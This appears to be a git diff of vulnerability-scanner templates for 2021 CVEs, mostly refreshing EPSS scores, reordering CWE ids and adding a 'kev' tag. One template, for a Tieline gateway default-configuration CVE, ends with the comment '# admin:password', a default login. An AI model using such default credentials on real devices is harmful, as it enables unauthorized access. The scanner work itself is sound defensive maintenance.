--git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 06aabc0b86..8e8a882b24 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30175 cwe-id: CWE-89 - epss-score: 0.03345 - epss-percentile: 0.9012 + epss-score: 0.04703 + epss-percentile: 0.91704 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index a62c6f39a9..4be05b47e6 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3019 cwe-id: CWE-22 - epss-score: 0.01151 - epss-percentile: 0.83025 + epss-score: 0.01044 + epss-percentile: 0.82303 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 1ddff837ee..95b24d4d0b 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40466 + epss-percentile: 0.4078 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 09fa5f6e6b..acc8d031bc 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30461 cwe-id: CWE-94 epss-score: 0.96767 - epss-percentile: 0.99521 + epss-percentile: 0.9955 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 7ebab45652..56364b0d9e 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-30497 cwe-id: CWE-22 - epss-score: 0.96366 - epss-percentile: 0.99355 + epss-score: 0.96549 + epss-percentile: 0.99461 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index b939fd561e..6d21c5fd74 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3110 cwe-id: CWE-89 epss-score: 0.95398 - epss-percentile: 0.99094 + epss-percentile: 0.99136 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 705b5f5110..ee9626ef8a 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 - epss-score: 0.94276 - epss-percentile: 0.98858 + epss-score: 0.94771 + epss-percentile: 0.99005 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index a185a0d543..2620b81719 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31249 cwe-id: CWE-74 epss-score: 0.00331 - epss-percentile: 0.67395 + epss-percentile: 0.6775 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 8621e74c23..f86155b769 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31250 cwe-id: CWE-79 epss-score: 0.97079 - epss-percentile: 0.99662 + epss-percentile: 0.99686 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 1020a981b1..42a586423e 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -16,15 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - epss-score: 0.97515 - epss-percentile: 0.99973 + epss-score: 0.97509 + epss-percentile: 0.99979 cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* metadata: max-request: 6 vendor: facade product: ignition framework: laravel - tags: cve,cve2021,laravel,rce,vulhub + tags: cve,cve2021,laravel,rce,vulhub,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 39167defda..110c48c068 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00271 - epss-percentile: 0.63726 + epss-percentile: 0.64136 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 94db35e917..de37d15270 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.4 cve-id: CVE-2021-31581 - cwe-id: CWE-269,CWE-312 + cwe-id: CWE-312,CWE-269 epss-score: 0.00285 - epss-percentile: 0.64676 + epss-percentile: 0.65076 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index b3062892fd..f9904f2e64 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31589 cwe-id: CWE-79 - epss-score: 0.00287 - epss-percentile: 0.64804 + epss-score: 0.00286 + epss-percentile: 0.65141 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 40e1768bb3..d512c30809 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31602 cwe-id: CWE-287 epss-score: 0.39689 - epss-percentile: 0.96761 + epss-percentile: 0.9681 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 595c3397a6..105923acce 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31682 cwe-id: CWE-79 epss-score: 0.00265 - epss-percentile: 0.63395 + epss-percentile: 0.63804 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 93af507b9d..27fd39403d 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-31755 cwe-id: CWE-787 epss-score: 0.96795 - epss-percentile: 0.99535 + epss-percentile: 0.99556 cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 704bb29590..3451fab047 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31805 cwe-id: CWE-917 - epss-score: 0.03276 - epss-percentile: 0.90017 + epss-score: 0.06452 + epss-percentile: 0.92871 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 03afede138..d82acd4e7d 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31856 cwe-id: CWE-89 epss-score: 0.05376 - epss-percentile: 0.92134 + epss-percentile: 0.92252 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 794b9e60a8..ef6e6210d1 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-31862 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49175 + epss-percentile: 0.49545 cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 382c44a562..0970d47278 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32030 cwe-id: CWE-287 - epss-score: 0.66309 - epss-percentile: 0.97479 + epss-score: 0.68378 + epss-percentile: 0.97598 cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 6a6bb52daa..faa530a5f0 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32172 cwe-id: CWE-862 - epss-score: 0.20372 - epss-percentile: 0.95712 + epss-score: 0.26193 + epss-percentile: 0.96167 cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index b6b5310dce..2da3e406f5 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-3223 cwe-id: CWE-22 - epss-score: 0.15641 - epss-percentile: 0.95204 + epss-score: 0.11532 + epss-percentile: 0.94609 cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index a1a4178b70..886c2031ea 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - epss-score: 0.96929 - epss-percentile: 0.99602 + epss-score: 0.9665 + epss-percentile: 0.99503 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 0806c53a60..040f31fd2a 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-32618 cwe-id: CWE-601 epss-score: 0.00104 - epss-percentile: 0.41813 + epss-percentile: 0.42134 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 313ca44560..80ddbc404d 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 - epss-score: 0.96678 - epss-percentile: 0.99486 + epss-score: 0.96728 + epss-percentile: 0.99534 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index ef7007ade6..fc1c3d11b4 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - epss-score: 0.0942 - epss-percentile: 0.93944 + epss-score: 0.0208 + epss-percentile: 0.87803 cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 4d0cfe3507..8a4089c54d 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.886 - epss-percentile: 0.98273 + epss-percentile: 0.98336 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index e710225e7a..0ccf3cc038 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-32820 - cwe-id: CWE-200,CWE-94 + cwe-id: CWE-94,CWE-200 epss-score: 0.00929 - epss-percentile: 0.80999 + epss-percentile: 0.81215 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 2219f3dbb9..49d8f68142 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.6 cve-id: CVE-2021-32853 cwe-id: CWE-79 - epss-score: 0.0045 - epss-percentile: 0.71943 + epss-score: 0.00585 + epss-percentile: 0.75679 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 7f728bc8c3..48cd5a744a 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-3293 cwe-id: CWE-22 - epss-score: 0.00226 - epss-percentile: 0.60142 + epss-score: 0.00263 + epss-percentile: 0.63626 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index d033cb5c54..af50d785fa 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.18886 - epss-percentile: 0.95572 + epss-percentile: 0.95647 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index a6f79e56cf..d67f84247d 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.10344 - epss-percentile: 0.94217 + epss-score: 0.30474 + epss-percentile: 0.96411 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index 64d11d5962..64989ff3b5 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33221 cwe-id: CWE-306 epss-score: 0.24628 - epss-percentile: 0.96022 + epss-percentile: 0.96081 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index 7408f7b8d9..9ca0c12f11 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 - epss-score: 0.96752 - epss-percentile: 0.99515 + epss-score: 0.96598 + epss-percentile: 0.99484 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 8c6a803e71..b95ae98e78 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.2 cve-id: CVE-2021-33544 cwe-id: CWE-78 - epss-score: 0.97529 + epss-score: 0.97519 epss-percentile: 0.99982 cpe: cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 62f4f79fff..d78cb4b237 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-33564 cwe-id: CWE-88 epss-score: 0.07998 - epss-percentile: 0.9344 + epss-percentile: 0.93541 cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 9adf8bd14c..c4fecc395f 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.5653 + epss-percentile: 0.57034 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index 65aa75a401..c347098d3b 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3377 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44596 + epss-score: 0.00121 + epss-percentile: 0.45976 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 53cf74486e..635e931540 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 - epss-score: 0.18908 - epss-percentile: 0.95576 + epss-score: 0.19285 + epss-percentile: 0.95679 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index 04c73677ff..bd4499143b 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 - epss-score: 0.02433 - epss-percentile: 0.88585 + epss-score: 0.01682 + epss-percentile: 0.86238 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index f5906d6c9f..5b2e993e7d 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-33851 cwe-id: CWE-79 - epss-score: 0.00092 - epss-percentile: 0.3834 + epss-score: 0.00069 + epss-percentile: 0.28715 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index ae213b8b1b..78e8c7bc58 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33904 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5076 + epss-percentile: 0.51135 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 639b9ca05c..132fcb29d9 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34370 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.54871 + epss-percentile: 0.55294 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 801d73d64f..cdfd9ec50c 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-34429 cwe-id: CWE-200 - epss-score: 0.79921 - epss-percentile: 0.97877 + epss-score: 0.80673 + epss-percentile: 0.97942 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 670e7ae83c..81774f17b5 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-34473 cwe-id: CWE-918 - epss-score: 0.97443 - epss-percentile: 0.99916 + epss-score: 0.9733 + epss-percentile: 0.9984 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index e7784016b7..b934a8df19 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-34621 cwe-id: CWE-306,CWE-269 - epss-score: 0.79769 - epss-percentile: 0.97869 + epss-score: 0.7888 + epss-percentile: 0.97895 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index 6994ab8bee..7679aca769 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34640 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 6ea1f0e6ea..59d2b72426 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-34643 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 8e75717a4f..9e16d5f6dc 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-34805 cwe-id: CWE-22 - epss-score: 0.01996 - epss-percentile: 0.87368 + epss-score: 0.03335 + epss-percentile: 0.9024 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 664549e65b..e3021e7e2a 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 - epss-score: 0.04866 - epss-percentile: 0.91736 + epss-score: 0.04377 + epss-percentile: 0.91389 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 14a6e0ae1b..6d4098b9dd 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-35265 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46567 + epss-percentile: 0.46903 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 164e6d7678..d6dbfe4b41 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35336 cwe-id: CWE-1188 epss-score: 0.08033 - epss-percentile: 0.93455 + epss-percentile: 0.93554 cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: status: - 200 -# admin:password \ No newline at end of file +# admin:password diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 549d2557dc..5bd7970e85 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - epss-score: 0.16223 - epss-percentile: 0.95287 + epss-score: 0.19555 + epss-percentile: 0.9571 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 5f2ae560d6..86e32a7ce0 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35464 cwe-id: CWE-502 - epss-score: 0.97364 - epss-percentile: 0.99844 + epss-score: 0.97347 + epss-percentile: 0.99852 cpe: 